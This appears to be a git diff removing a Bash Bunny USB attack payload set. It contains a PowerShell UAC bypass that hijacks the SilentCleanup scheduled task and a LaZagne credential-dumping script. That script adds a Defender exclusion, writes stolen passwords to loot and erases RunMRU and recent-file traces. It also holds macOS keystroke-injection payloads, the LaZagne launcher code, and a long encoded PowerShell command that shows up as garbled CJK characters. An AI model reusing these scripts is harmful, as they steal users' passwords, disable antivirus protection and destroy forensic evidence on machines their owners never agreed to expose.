} catch {
|
||||
Return
|
||||
}
|
||||
} else {
|
||||
$EncodedCommand = $PSBoundParameters.EncodedCommand
|
||||
}
|
||||
|
||||
$regpath = "HKCU:\Environment"
|
||||
$key = "windir"
|
||||
$taskrunner = "schtasks"
|
||||
$taskparam = "/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
|
||||
$waittime = 5
|
||||
$cmd = "powershell "
|
||||
if($Hide) {
|
||||
$cmdparams = "/Noni /NoP /W h /E "
|
||||
} else {
|
||||
$cmdparams = "/Noni /NoP /E "
|
||||
}
|
||||
|
||||
|
||||
|
||||
if($Method -eq "File") {
|
||||
$tmpsc = "iex (gc -path `"$File`" -Raw)"
|
||||
$encode = [System.Convert]::ToBase64String(([System.Text.Encoding]::Unicode.GetBytes($tmpsc)))
|
||||
$cmdparams += "`"$encode`""
|
||||
} else {
|
||||
$cmdparams += "`"$encodedcommand`""
|
||||
}
|
||||
|
||||
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator') -or (([Environment]::UserName).ToLower() -eq "system")) {
|
||||
Start-Process ($cmd.Trim()) -ArgumentList $cmdparams
|
||||
} else {
|
||||
Set-ItemProperty -Path $regpath -Name $key -Value ("cmd /c" + $cmd + $cmdparams + "& ::")
|
||||
Start-Process $taskrunner -ArgumentList $taskparam
|
||||
Start-Sleep -s $waittime
|
||||
Remove-ItemProperty -Path $regpath -Name $key -Force | Out-Null
|
||||
}
|
||||
}
|
||||
}
|
||||
$currentdir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition)
|
||||
Invoke-TaskCleanerBypass -Method File -Filename $currentdir\lazassword.ps1 -hide
|
||||
@@ -1,22 +0,0 @@
|
||||
$BLABEL = (gwmi -class win32_volume -f {label = "BASHBUNNY"}).DriveLetter
|
||||
Add-MpPreference -ExclusionPath "$BLABEL"
|
||||
Expand-Archive -Force $BLABEL\lazagne.zip $BLABEL\lazagne
|
||||
$LPATH = & $BLABEL\lazagne\lazagne.exe all -vv
|
||||
$ipV4 = Test-Connection -ComputerName (hostname) -Count 1 | Select IPV4Address
|
||||
$tar_hostname = hostname
|
||||
mkdir $BLABEL\loot\LaZassword
|
||||
$LOOTFILE = "$BLABEL\loot\LaZassword\$ipV4$tar_hostname.txt"
|
||||
$LPATH | Out-File -FilePath $LOOTFILE
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
Remove-Item "$BLABEL\lazagne\" -recurse
|
||||
Remove-MpPreference -ExclusionPath "$BLABEL"
|
||||
New-Item -Path "$BLABEL\loot\LaZassword\done" -ItemType File
|
||||
stop-process -Name explorer
|
||||
Get-ChildItem -Path C:\Users\\$env:UserName\AppData\Roaming\Microsoft\Windows\Recent -Include * -File -Recurse | foreach { $_.Delete()}
|
||||
$bb = (gwmi win32_volume -f 'label=''BASHBUNNY''').Name
|
||||
$driveEject = New-Object -comObject Shell.Application
|
||||
$COUNT=1
|
||||
while ($COUNT -ne 5){
|
||||
$driveEject.Namespace(17).ParseName("$bb").InvokeVerb("Eject")
|
||||
$COUNT++
|
||||
}
|
||||
@@ -1,34 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: LaZassword
|
||||
# Author: kuyaya
|
||||
# Version: 1.1
|
||||
|
||||
# Check readiness & prepare environment
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
# Ensure loot is available for saving results.
|
||||
mount -o sync /dev/nandf /root/udisk/
|
||||
|
||||
# Setup
|
||||
DUCKY_LANG=ch
|
||||
GET SWITCH_POSITION
|
||||
GET TARGET_HOSTNAME
|
||||
|
||||
# Attack
|
||||
LED ATTACK
|
||||
|
||||
# Run lazassword.ps1 as admin
|
||||
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\bypass.ps1')"
|
||||
|
||||
# Wait until passwords are grabbed
|
||||
while [ ! -f /root/udisk/loot/LaZassword/done ]
|
||||
do
|
||||
LED ATTACK
|
||||
done
|
||||
|
||||
# Finish
|
||||
# The remove of the file is necessary. Else, the loop wouldn't work.
|
||||
rm /root/udisk/loot/LaZassword/done
|
||||
LED FINISH
|
||||
File diff suppressed because it is too large
Load Diff
@@ -1,238 +0,0 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# !/usr/bin/python
|
||||
|
||||
##############################################################################
|
||||
# #
|
||||
# By Alessandro ZANNI #
|
||||
# #
|
||||
##############################################################################
|
||||
|
||||
# Disclaimer: Do Not Use this program for illegal purposes ;)
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
import os
|
||||
import time
|
||||
|
||||
# Configuration
|
||||
from lazagne.config.write_output import write_in_file, StandardOutput
|
||||
from lazagne.config.manage_modules import get_categories
|
||||
from lazagne.config.constant import constant
|
||||
from lazagne.config.run import run_lazagne, create_module_dic
|
||||
|
||||
|
||||
# Object used to manage the output / write functions (cf write_output file)
|
||||
constant.st = StandardOutput()
|
||||
modules = create_module_dic()
|
||||
|
||||
|
||||
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
|
||||
if output_dir:
|
||||
if os.path.isdir(output_dir):
|
||||
constant.folder_name = output_dir
|
||||
else:
|
||||
print('[!] Specify a directory, not a file !')
|
||||
|
||||
if txt_format:
|
||||
constant.output = 'txt'
|
||||
|
||||
if json_format:
|
||||
constant.output = 'json'
|
||||
|
||||
if all_format:
|
||||
constant.output = 'all'
|
||||
|
||||
if constant.output:
|
||||
if not os.path.exists(constant.folder_name):
|
||||
os.makedirs(constant.folder_name)
|
||||
# constant.file_name_results = 'credentials' # let the choice of the name to the user
|
||||
|
||||
if constant.output != 'json':
|
||||
constant.st.write_header()
|
||||
|
||||
|
||||
def quiet_mode(is_quiet_mode=False):
|
||||
if is_quiet_mode:
|
||||
constant.quiet_mode = True
|
||||
|
||||
|
||||
def verbosity(verbose=0):
|
||||
# Write on the console + debug file
|
||||
if verbose == 0:
|
||||
level = logging.CRITICAL
|
||||
elif verbose == 1:
|
||||
level = logging.INFO
|
||||
elif verbose >= 2:
|
||||
level = logging.DEBUG
|
||||
|
||||
formatter = logging.Formatter(fmt='%(message)s')
|
||||
stream = logging.StreamHandler(sys.stdout)
|
||||
stream.setFormatter(formatter)
|
||||
root = logging.getLogger()
|
||||
root.setLevel(level)
|
||||
# If other logging are set
|
||||
for r in root.handlers:
|
||||
r.setLevel(logging.CRITICAL)
|
||||
root.addHandler(stream)
|
||||
|
||||
|
||||
def manage_advanced_options(user_password=None, dictionary_attack=None):
|
||||
if user_password:
|
||||
constant.user_password = user_password
|
||||
|
||||
if dictionary_attack:
|
||||
constant.dictionary_attack = dictionary_attack
|
||||
|
||||
|
||||
def clean_args(arg):
|
||||
"""
|
||||
Remove not necessary values to get only subcategories
|
||||
"""
|
||||
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
|
||||
try:
|
||||
del arg[i]
|
||||
except Exception:
|
||||
pass
|
||||
return arg
|
||||
|
||||
|
||||
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
|
||||
"""
|
||||
This function will be removed, still there for compatibility with other tools
|
||||
Everything is on the config/run.py file
|
||||
"""
|
||||
for pwd_dic in run_lazagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=password,
|
||||
interactive=interactive
|
||||
):
|
||||
yield pwd_dic
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
|
||||
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
|
||||
help='laZagne version')
|
||||
|
||||
# ------------------------------------------- Permanent options ------------------------------------------
|
||||
# Version and verbosity
|
||||
PPoptional = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PPoptional._optionals.title = 'optional arguments'
|
||||
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
|
||||
help='will prompt a window to the user')
|
||||
PPoptional.add_argument('-password', dest='password', action='store',
|
||||
help='user password used to decrypt the keychain')
|
||||
PPoptional.add_argument('-attack', dest='attack', action='store_true',
|
||||
help='500 well known passwords used to check the user hash (could take a while)')
|
||||
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
|
||||
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
|
||||
help='quiet mode: nothing is printed to the output', default=False, )
|
||||
|
||||
# Output
|
||||
PWrite = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PWrite._optionals.title = 'Output'
|
||||
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
|
||||
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
|
||||
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
|
||||
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
|
||||
default='.')
|
||||
|
||||
# -------------------------------- Add options and suboptions to all modules ------------------------------
|
||||
all_subparser = []
|
||||
categories = get_categories()
|
||||
for c in categories:
|
||||
categories[c]['parser'] = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
categories[c]['parser']._optionals.title = categories[c]['help']
|
||||
|
||||
# Manage options
|
||||
categories[c]['subparser'] = []
|
||||
for module in modules[c]:
|
||||
m = modules[c][module]
|
||||
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
|
||||
help=m.options['help'])
|
||||
|
||||
# Manage all sub options by modules
|
||||
if m.suboptions:
|
||||
tmp = []
|
||||
for sub in m.suboptions:
|
||||
tmp_subparser = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
tmp_subparser._optionals.title = sub['title']
|
||||
if 'type' in sub:
|
||||
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
|
||||
dest=sub['dest'], help=sub['help'])
|
||||
else:
|
||||
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
|
||||
help=sub['help'])
|
||||
tmp.append(tmp_subparser)
|
||||
all_subparser.append(tmp_subparser)
|
||||
categories[c]['subparser'] += tmp
|
||||
|
||||
# ------------------------------------------- Print all -------------------------------------------
|
||||
parents = [PPoptional] + all_subparser + [PWrite]
|
||||
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
|
||||
for c in categories:
|
||||
parser_tab = [PPoptional, categories[c]['parser']]
|
||||
if 'subparser' in categories[c]:
|
||||
if categories[c]['subparser']:
|
||||
parser_tab += categories[c]['subparser']
|
||||
parser_tab += [PWrite]
|
||||
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
|
||||
dic = dict(list(dic.items()) + list(dic_tmp.items()))
|
||||
|
||||
subparsers = parser.add_subparsers(help='Choose a main command')
|
||||
for d in dic:
|
||||
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
|
||||
|
||||
# ------------------------------------------- Parse arguments -------------------------------------------
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = dict(parser.parse_args()._get_kwargs())
|
||||
arguments = parser.parse_args()
|
||||
|
||||
# Define constant variables
|
||||
output(
|
||||
output_dir=args['output'],
|
||||
txt_format=args['write_normal'],
|
||||
json_format=args['write_json'],
|
||||
all_format=args['write_all']
|
||||
)
|
||||
verbosity(verbose=args['verbose'])
|
||||
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
|
||||
quiet_mode(is_quiet_mode=args['quiet'])
|
||||
|
||||
# Print the title
|
||||
constant.st.first_title()
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
category_selected = args['auditType']
|
||||
subcategories = clean_args(args)
|
||||
|
||||
for r in runLaZagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=args.get('password', None),
|
||||
interactive=arguments.interactive
|
||||
):
|
||||
pass
|
||||
|
||||
write_in_file(constant.stdout_result)
|
||||
constant.st.print_footer(elapsed_time=str(time.time() - start_time))
|
||||
Binary file not shown.
@@ -1,44 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Mac Password Grabber
|
||||
# Author: Overtimedev
|
||||
# Version: 1.0
|
||||
#
|
||||
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
|
||||
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
|
||||
#
|
||||
# Amber..............Executing payload
|
||||
# Green..............Finished
|
||||
#
|
||||
|
||||
LED G R
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
lootdir=loot/MacPass
|
||||
mkdir -p /root/udisk/$lootdir
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING cd /Volumes/BashBunny/
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING python get-pip.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING pip install -r requirements.txt
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
|
||||
QUACK ENTER
|
||||
QUACK DELAY 10000
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
||||
@@ -1,25 +0,0 @@
|
||||
# Mac Password Grabber for the BashBunny
|
||||
|
||||
* Author: Overtimedev
|
||||
* Version: Version 1.0
|
||||
* Target: OSX
|
||||
|
||||
## Description
|
||||
|
||||
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
|
||||
|
||||
|
||||
|
||||
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
|
||||
|
||||
2. unzip lazagne.zip into the root folder of the bunny
|
||||
|
||||
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Amber | Executin Payload |
|
||||
| Green | Attack Finished |
|
||||
@@ -1,8 +0,0 @@
|
||||
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
pyasn1
|
||||
enum34; python_version < '3.4' and sys_platform == 'win32'
|
||||
rsa; sys_platform == 'win32'
|
||||
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
|
||||
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
|
||||
pycryptodome
|
||||
@@ -1,2 +0,0 @@
|
||||
挦獬潰敷獲敨汬攮數ⴠ湥䅊睂䡁䅉睢橂䝁䅕督穂䍁䅁児杁䕁䅣党あ䍁䄰䅕祂䝁䄸睙求䡁䅍督杁䝁䅷督桂䡁䅍督㝁䍁䅧杢求䡁䅣兌偂䝁䅉杓䙂䝁䅍䅖杁䍁䅁兓偂䍁䄴睑療䕁䄰䅕祂䝁䅕督穂䝁䅫睢畂䍁䄴䅒求䕁䅙䅢桂䡁䅑党穂䙁䅑杣䙂䕁䅅兔潁䙁䅳睕㕂䡁䅍䅖求䕁䄰杌灂䝁䄸杌瑂䕁䅕兔偂䡁䅉入穂䡁䅑杣求䝁䅅兢摂䙁䅳督婂䙁䅍䅖䙂䕁䄰杌橂䝁䄸杔㉂䕁䅕杣啂䙁䄰杏㙁䕁䅙杣偂䝁䄰杙桂䙁䅍兒㉁䑁䅑睕啂䡁䅉兡畂䝁䅣䅋杁䍁䅣来坂䙁䅙杕楂䑁䅫睢㍂䕁䅕䅓㍁䝁䄴杖ㅁ䡁䅣李䭂䕁䅉兓䭂䕁䅫睢硁䕁䄸党㉁䝁䅧兖桂䙁䅉䅍あ䕁䅣兎偂䝁䅣兒求䝁䄰睒佂䕁䅫兕硂䙁䅅䅎㍁䕁䅣兢祁䕁䄴䅓煂䝁䄸睒灂䡁䅅杤㕁䑁䅫兎㕂䙁䅅䅢䑂䝁䅅兒兂䑁䅙免㉁䙁䅣䅣癁䝁䅯䅏牁䝁䅉杤兂䑁䅕䅏㕁䝁䄴兑䩂䕁䅑兎䩂䕁䅅䅎䝂䝁䄰督㕁䝁䅍䅡獂䡁䅣睋偂䕁䄸李灂䙁䅉兖䥂䡁䅣兢塂䙁䅫䅥偂䕁䅳免塂䕁䄴杣䵂䝁䅙䅕䉂䡁䅕䅡剂䝁䅕睍ぁ䕁䅳兤塂䕁䅣睓㍂䝁䄰䅗㑁䕁䅷睎䉂䙁䅯䅎湂䝁䅙䅖兂䕁䅍兕䡂䙁䅅䅥塂䝁䄰兡浂䕁䅣党婂䕁䅫睎啂䕁䅕睍兂䙁䅯入桂䕁䅍兏煂䑁䅁䅏坂䑁䅙睒䍂䑁䅁杗呂䡁䅑䅒䵂䙁䅍杤佂䑁䅍兒㕂䑁䅕兑䩂䡁䅯兏䑂䙁䅣䅍癁䝁䅑䅢硁䕁䄴兤瑂䙁䅣睑あ䡁䅅来瑂䡁䅫䅢佂䡁䅯杚穁䝁䅣䅚㉂䝁䅳䅔坂䑁䅉杙潂䙁䅧兙噂䡁䅁䅥牂䡁䅕䅥㕁䑁䅣李湂䡁䅕䅚穂䝁䄴李䥂䙁䅍睑浂䙁䅣睢㍂䑁䅫督慂䕁䄰督湂䝁䅕兔噂䙁䅉杣㉂䝁䅅兢佂䙁䅕来䱂䡁䅧睙楂䑁䅁杗㍁䙁䅙䅔㉂䑁䅁杕瑂䡁䅕䅢睂䑁䅕睚療䝁䅉兖潂䕁䅑䅥㉁䑁䅁䅢瑂䕁䅉村睁䝁䅫杍乂䑁䅁睡剂䡁䅁䅖䱂䑁䅑杕灂䝁䅷杢ㅁ䕁䅍睖㑁䕁䅕睤啂䑁䅅䅔䕂䝁䅑䅔祂䙁䅅兢呂䝁䅯䅣楂䑁䅕兙䑂䡁䅉李睂䝁䅳兕㑁䕁䅕党䵂䕁䄰杔㑁䝁䅫兢あ䕁䅉睙硂䑁䅉睑療䡁䅍杣慂䑁䅅睓䱂䡁䅫杣湂䡁䅕村䩂䝁䅑杓坂䡁䅁免㍂䍁䅳兎睂䕁䅷杙療䡁䅍睤睁䕁䄴杍潂䍁䄸睑煂䕁䅣免ㅁ䕁䅙杗慂䍁䄸兤あ䑁䅁睒湂䡁䅑兓塂䙁䅍睎䑂䙁䅁睙䥂䕁䅳䅖啂䙁䅑睙䑂䕁䅑䅓䡂䙁䅣睔瑂䑁䅫杖浂䝁䅷兏䭂䕁䄰免ㅁ䝁䅙睤䥂䑁䅫睕穂䕁䅙兏祂䙁䅙兙婂䡁䅁兣乂䡁䅣睔ㅁ䕁䅙䅏ぁ䕁䅫睍䑂䕁䅉兢䍂䕁䅍䅥硂䝁䅧睑㍁䕁䅷睚䍂䍁䅳督療䝁䅳睒桂䑁䅁睓㕂䡁䅫兔佂䝁䄸䅔坂䕁䅉睤奂䝁䅯睖歂䡁䅅睢ㅁ䑁䅍䅕あ䡁䅫䅕䉂䡁䅁䅚䵂䑁䅑入啂䡁䅍李慂䝁䅍兤㍁䍁䄸睑卂䡁䅑䅏噂䝁䅷䅎噂䕁䅉兙㍂䙁䅫睎啂䝁䅷兖潂䡁䅍睕䝂䡁䅫杓ㅁ䕁䅷兏䵂䑁䅉睒䑂䡁䅕免ㅁ䡁䅕杔潂䝁䅯䅚求䡁䅕睖噂䝁䅍兎㕂䡁䅉睑癁䕁䄰睑乂䕁䅙兗潂䕁䅷兡ぁ䡁䅕村湂䙁䅅来塂䕁䅧䅗㉂䕁䅙杔偂䕁䄴兔䥂䝁䅉睌煂䙁䅯䅕㕂䙁䅉杢䱂䡁䅉杚硂䙁䅁䅖獂䝁䄴兕牂䙁䅧杚煂䝁䅳免䡂䡁䅙睖兂䙁䅯䅒㑁䑁䅅杖歂䙁䅣李硂䑁䅁兒ㅁ䙁䅫兙㕁䝁䅣睓穁䙁䅉䅒㉂䑁䅫杔睁䙁䅣杢㍁䡁䅙杗䝂䡁䅑䅖療䑁䅣免煂䝁䅅杗灂䍁䄸䅍呂䡁䅑睌潂䑁䅧睕硁䡁䅯免睂䕁䅯杍㑁䝁䅣杖䩂䡁䅁睔慂䙁䅯睓㉂䡁䅣党獂䕁䅯杗坂䑁䅙䅏噂䝁䅑睎啂䡁䅁兎硂䕁䄸兏穂䑁䅍条䑂䡁䅁睔灂䑁䅑免婂䡁䅍睔坂䕁䅉䅥療䝁䅫兕硁䕁䄸党穂䑁䅕兗歂䡁䅙杙求䝁䅙䅏䉂䝁䅙兗坂䝁䅧䅖䩂䝁䅅睚硁䝁䅷条橂䡁䅉兖兂䙁䅫睓牁䕁䅫兤偂䕁䅕䅚奂䑁䅣兣䭂䑁䅉兎歂䡁䅯睓浂䝁䅉䅕浂䕁䄸兎煂䙁䅍兒塂䑁䅑杕瑂䕁䄴䅥䕂䡁䅣兣灂䝁䅯兔灂䕁䅧杍穂䕁䅍杔畂䕁䅣兎剂䙁䅅杍祂䑁䅙免睂䝁䅧睓牂䕁䅧睚㕂䙁䅙村畂䡁䅧睡橂䙁䅕䅔祁䕁䅅杚婂䕁䅍来灂䕁䅕睎䵂䝁䅣兕穂䑁䅧睖奂䝁䅑兖剂䝁䄸兤㍂䙁䅕兕䩂䕁䅳兎婂䙁䅍兓灂䕁䅷兙㑁䑁䅍兎㉂䡁䅫兕穁䑁䅑兙療䝁䅍李灂䕁䅯䅒塂䑁䅁杢偂䕁䅍睓卂䝁䅫杖睁䡁䅯䅓ぁ䍁䅳睑䝂䕁䅑杓䙂䙁䅣杢硂䙁䅉䅓瑂䝁䅫杢穂䝁䅯党灂䝁䅫兙兂䝁䅅睔奂䡁䅙兕ㅁ䙁䅧睖楂䡁䅕睒湂䕁䅯杕䵂䕁䅫睌婂䕁䅑杓求䝁䄰䅣祁䕁䅣村㕁䑁䅣入楂䙁䅍兙あ䝁䅍督㍁䙁䅅䅓㙂䝁䅙䅕潂䕁䅑睡求䕁䅫杣慂䑁䅁督佂䡁䅙䅒求䕁䅫兤䉂䝁䅧䅕㕂䡁䅅䅢㍂䡁䅑杚ぁ䕁䅅睊杁䍁䅫䅉獁䙁䅳督㕂䙁䅍䅤求䝁䄰杌䩂䕁䄸杌䑂䕁䄸兢兂䙁䅉党呂䙁䅍兡偂䝁䄴杌橂䝁䄸兢睂䡁䅉兒呂䙁䅍兡偂䕁䄴兔療䕁䅑兒摂䑁䅯杏䕂䝁䅕睑偂䕁䄰䅣祂䝁䅕督呂䍁䅁克㡂䍁䅁杚偂䙁䅉兒桂䝁䅍䅡杁䡁䅳䅉畂䝁䅕睤瑁䕁䄸杙䭂䕁䅕睙啂䍁䅁䅉䩂䝁䄸杌穂䙁䅑杕求䕁䅅兔卂䝁䅕兑歂䝁䅕杕潁䍁䅑睘杁䍁䅷睗穂䡁䅫睕啂䝁䅕兢畁䡁䅑兒㑂䙁䅑杌求䝁䄴睑療䕁䅑兓畂䝁䅣兘㙁䑁䅯兙呂䕁䅍兓䩂䍁䅁克杁䡁䄰克畁䙁䅉兒䉂䕁䅑䅤療䕁䅕杢歂䍁䅧䅉灁䡁䅷兡畂䡁䅙睢䱂䕁䅕兌求䡁䅧䅣卂䕁䅕睕呂䝁䅫睢佂䅁㴽
|
||||
潰敷獲敨汬攮數ⴠ湥䅊睂䡁䅉睢橂䝁䅕督穂䍁䅁児杁䕁䅣党あ䍁䄰䅕祂䝁䄸睙求䡁䅍督杁䝁䅷督桂䡁䅍督㝁䍁䅧杢求䡁䅣兌偂䝁䅉杓䙂䝁䅍䅖杁䍁䅁兓偂䍁䄴睑療䕁䄰䅕祂䝁䅕督穂䝁䅫睢畂䍁䄴䅒求䕁䅙䅢桂䡁䅑党穂䙁䅑杣䙂䕁䅅兔潁䙁䅳睕㕂䡁䅍䅖求䕁䄰杌灂䝁䄸杌瑂䕁䅕兔偂䡁䅉入穂䡁䅑杣求䝁䅅兢摂䙁䅳督婂䙁䅍䅖䙂䕁䄰杌橂䝁䄸杔㉂䕁䅕杣啂䙁䄰杏㙁䕁䅙杣偂䝁䄰杙桂䙁䅍兒㉁䑁䅑睕啂䡁䅉兡畂䝁䅣䅋杁䍁䅣来坂䙁䅙杕楂䑁䅫睢㍂䕁䅕䅓㍁䝁䄴杖ㅁ䡁䅣李䭂䕁䅉兓䭂䕁䅫睢硁䕁䄸党㉁䝁䅧兖桂䙁䅉䅍あ䕁䅣兎偂䝁䅣兒求䝁䄰睒佂䕁䅫兕硂䙁䅅䅎㍁䕁䅣兢祁䕁䄴䅓煂䝁䄸睒灂䡁䅅杤㕁䑁䅫兎㕂䙁䅅䅢䑂䝁䅅兒兂䑁䅙免㉁䙁䅣䅣癁䝁䅯䅏牁䝁䅉杤兂䑁䅕䅏㕁䝁䄴兑䩂䕁䅑兎䩂䕁䅅䅎䝂䝁䄰督㕁䝁䅍䅡獂䡁䅣睋偂䕁䄸李灂䙁䅉兖䥂䡁䅣兢塂䙁䅫䅥偂䕁䅳免塂䕁䄴杣䵂䝁䅙䅕䉂䡁䅕䅡剂䝁䅕睍ぁ䕁䅳兤塂䕁䅣睓㍂䝁䄰䅗㑁䕁䅷睎䉂䙁䅯䅎湂䝁䅙䅖兂䕁䅍兕䡂䙁䅅䅥塂䝁䄰兡浂䕁䅣党婂䕁䅫睎啂䕁䅕睍兂䙁䅯入桂䕁䅍兏煂䑁䅁䅏坂䑁䅙睒䍂䑁䅁杗呂䡁䅑䅒䵂䙁䅍杤佂䑁䅍兒㕂䑁䅕兑䩂䡁䅯兏䑂䙁䅣䅍癁䝁䅑䅢硁䕁䄴兤瑂䙁䅣睑あ䡁䅅来瑂䡁䅫䅢佂䡁䅯杚穁䝁䅣䅚㉂䝁䅳䅔坂䑁䅉杙潂䙁䅧兙噂䡁䅁䅥牂䡁䅕䅥㕁䑁䅣李湂䡁䅕䅚穂䝁䄴李䥂䙁䅍睑浂䙁䅣睢㍂䑁䅫督慂䕁䄰督湂䝁䅕兔噂䙁䅉杣㉂䝁䅅兢佂䙁䅕来䱂䡁䅧睙楂䑁䅁杗㍁䙁䅙䅔㉂䑁䅁杕瑂䡁䅕䅢睂䑁䅕睚療䝁䅉兖潂䕁䅑䅥㉁䑁䅁䅢瑂䕁䅉村睁䝁䅫杍乂䑁䅁睡剂䡁䅁䅖䱂䑁䅑杕灂䝁䅷杢ㅁ䕁䅍睖㑁䕁䅕睤啂䑁䅅䅔䕂䝁䅑䅔祂䙁䅅兢呂䝁䅯䅣楂䑁䅕兙䑂䡁䅉李睂䝁䅳兕㑁䕁䅕党䵂䕁䄰杔㑁䝁䅫兢あ䕁䅉睙硂䑁䅉睑療䡁䅍杣慂䑁䅅睓䱂䡁䅫杣湂䡁䅕村䩂䝁䅑杓坂䡁䅁免㍂䍁䅳兎睂䕁䅷杙療䡁䅍睤睁䕁䄴杍潂䍁䄸睑煂䕁䅣免ㅁ䕁䅙杗慂䍁䄸兤あ䑁䅁睒湂䡁䅑兓塂䙁䅍睎䑂䙁䅁睙䥂䕁䅳䅖啂䙁䅑睙䑂䕁䅑䅓䡂䙁䅣睔瑂䑁䅫杖浂䝁䅷兏䭂䕁䄰免ㅁ䝁䅙睤䥂䑁䅫睕穂䕁䅙兏祂䙁䅙兙婂䡁䅁兣乂䡁䅣睔ㅁ䕁䅙䅏ぁ䕁䅫睍䑂䕁䅉兢䍂䕁䅍䅥硂䝁䅧睑㍁䕁䅷睚䍂䍁䅳督療䝁䅳睒桂䑁䅁睓㕂䡁䅫兔佂䝁䄸䅔坂䕁䅉睤奂䝁䅯睖歂䡁䅅睢ㅁ䑁䅍䅕あ䡁䅫䅕䉂䡁䅁䅚䵂䑁䅑入啂䡁䅍李慂䝁䅍兤㍁䍁䄸睑卂䡁䅑䅏噂䝁䅷䅎噂䕁䅉兙㍂䙁䅫睎啂䝁䅷兖潂䡁䅍睕䝂䡁䅫杓ㅁ䕁䅷兏䵂䑁䅉睒䑂䡁䅕免ㅁ䡁䅕杔潂䝁䅯䅚求䡁䅕睖噂䝁䅍兎㕂䡁䅉睑癁䕁䄰睑乂䕁䅙兗潂䕁䅷兡ぁ䡁䅕村湂䙁䅅来塂䕁䅧䅗㉂䕁䅙杔偂䕁䄴兔䥂䝁䅉睌煂䙁䅯䅕㕂䙁䅉杢䱂䡁䅉杚硂䙁䅁䅖獂䝁䄴兕牂䙁䅧杚煂䝁䅳免䡂䡁䅙睖兂䙁䅯䅒㑁䑁䅅杖歂䙁䅣李硂䑁䅁兒ㅁ䙁䅫兙㕁䝁䅣睓穁䙁䅉䅒㉂䑁䅫杔睁䙁䅣杢㍁䡁䅙杗䝂䡁䅑䅖療䑁䅣免煂䝁䅅杗灂䍁䄸䅍呂䡁䅑睌潂䑁䅧睕硁䡁䅯免睂䕁䅯杍㑁䝁䅣杖䩂䡁䅁睔